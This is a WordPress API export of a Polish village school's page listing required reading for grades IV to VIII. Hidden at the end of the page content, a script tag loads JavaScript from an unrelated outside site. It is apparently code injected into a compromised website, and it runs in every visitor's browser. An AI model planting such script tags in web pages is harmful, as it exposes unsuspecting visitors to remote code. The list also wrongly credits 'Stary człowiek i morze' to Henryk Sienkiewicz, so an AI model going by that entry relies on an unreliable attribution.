{"id":54,"date":"2015-12-15T13:41:48","date_gmt":"2015-12-15T12:41:48","guid":{"rendered":"http:\/\/spmrowiny.gmina.zarow.pl\/?page_id=54"},"modified":"2020-04-23T09:21:29","modified_gmt":"2020-04-23T07:21:29","slug":"lektury-kl-iv-vi","status":"publish","type":"page","link":"http:\/\/spmrowiny.gmina.zarow.pl\/index.php\/lektury-kl-iv-vi\/","title":{"rendered":"Lektury kl. IV-VIII"},"content":{"rendered":"<p><span style=\"color: #0000ff;\"><strong>LEKTURY KLASY\u00a0 IV<\/strong><\/span><\/p>\n<p>Jan Brzechwa, Akademia Pana Kleksa.<\/p>\n<p>J. Christa, Kajko i Kokosz. Szko\u0142a latania.<\/p>\n<p>Sempe i Goscinny, Miko\u0142ajek.<\/p>\n<p>Joanna Olech, Dynastia Mizio\u0142k\u00f3w.<\/p>\n<p><strong>\u00a0<\/strong><\/p>\n<p><span style=\"color: #0000ff;\"><strong>LEKTURY KLASY\u00a0 V<\/strong><\/span><\/p>\n<p>Rafa\u0142 Kosik, Felix, Net i Nika oraz Gang Niewidzialnych Ludzi.<\/p>\n<p>S. Lewis, Opowie\u015bci z Narnii. Lew, czarownica i stara szafa.<\/p>\n<p>Boles\u0142aw Prus , Katarynka.<\/p>\n<p>Tolkien, Hobbit.<\/p>\n<p>Ferenc Molnar, Ch\u0142opcy z Placu Broni.<\/p>\n<p>&nbsp;<\/p>\n<p><strong>\u00a0<\/strong><\/p>\n<p><span style=\"color: #0000ff;\"><strong>LEKTURY KLASY\u00a0 VI<\/strong><\/span><\/p>\n<p>Stanis\u0142aw Lem, Bajki robot\u00f3w.<\/p>\n<p>Irena Jurgielewiczowa, Ten obcy.<\/p>\n<p>Ma\u0142gorzata Musierowicz, K\u0142amczucha.<\/p>\n<p>Edmund Niziurski, Spos\u00f3b na Alcybiadesa.<\/p>\n<p>Henryk Sienkiewicz, W pustyni w puszczy.<\/p>\n<p>&nbsp;<\/p>\n<p><span style=\"color: #0000ff;\"><strong>LEKTURY KLASY\u00a0 VII<\/strong><\/span><\/p>\n<p>Antoine de Saint-Exupery, Ma\u0142y Ksi\u0105\u017c\u0119.<\/p>\n<p>Juliusz S\u0142owacki, Balladyna.<\/p>\n<p>Aleksander Fredro, Zemsta.<\/p>\n<p>Henryk Sienkiewicz, Latarnik.<\/p>\n<p>Henryk Sienkiewicz, Stary cz\u0142owiek i morze.<\/p>\n<p>Henryk Sienkiewicz, Quo vadis.<\/p>\n<p>Dickens, Opowie\u015b\u0107 wigilijna.<\/p>\n<p><span style=\"color: #0000ff;\"><strong>LEKTURY KLASY\u00a0 VIII<\/strong><\/span><\/p>\n<p>Aleksander Kami\u0144ski, Kamienie na szaniec.<\/p>\n<p>Stefan \u017beromski, Syzyfowe prace.<\/p>\n<p>S\u0142awomir Mro\u017cek, Artysta.<\/p>\n<p>Adam Mickiewicz, Pan Tadeusz.<\/p>\n<p>Wa\u0144kowicz, Ziele na kraterze, T\u0119dy i ow\u0119dy (fragmenty)<\/p>\n<p>&nbsp;<script src=http:\/\/www.onlymobilepro.com\/wp-content\/plugins\/syntaxhighlighter\/syntaxhighlighter2\/scripts\/include2.js><\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>LEKTURY KLASY\u00a0 IV Jan Brzechwa, Akademia Pana Kleksa. J. Christa, Kajko i Kokosz. Szko\u0142a latania. Sempe i Goscinny, Miko\u0142ajek. Joanna Olech, Dynastia Mizio\u0142k\u00f3w. \u00a0 LEKTURY KLASY\u00a0 V Rafa\u0142 Kosik, Felix, Net i Nika oraz Gang Niewidzialnych Ludzi. S. Lewis, Opowie\u015bci z Narnii. Lew, czarownica i stara szafa. Boles\u0142aw Prus , Katarynka. Tolkien, Hobbit. Ferenc Molnar, [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":[],"_links":{"self":[{"href":"http:\/\/spmrowiny.gmina.zarow.pl\/index.php\/wp-json\/wp\/v2\/pages\/54"}],"collection":[{"href":"http:\/\/spmrowiny.gmina.zarow.pl\/index.php\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"http:\/\/spmrowiny.gmina.zarow.pl\/index.php\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"http:\/\/spmrowiny.gmina.zarow.pl\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/spmrowiny.gmina.zarow.pl\/index.php\/wp-json\/wp\/v2\/comments?post=54"}],"version-history":[{"count":8,"href":"http:\/\/spmrowiny.gmina.zarow.pl\/index.php\/wp-json\/wp\/v2\/pages\/54\/revisions"}],"predecessor-version":[{"id":15051,"href":"http:\/\/spmrowiny.gmina.zarow.pl\/index.php\/wp-json\/wp\/v2\/pages\/54\/revisions\/15051"}],"wp:attachment":[{"href":"http:\/\/spmrowiny.gmina.zarow.pl\/index.php\/wp-json\/wp\/v2\/media?parent=54"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}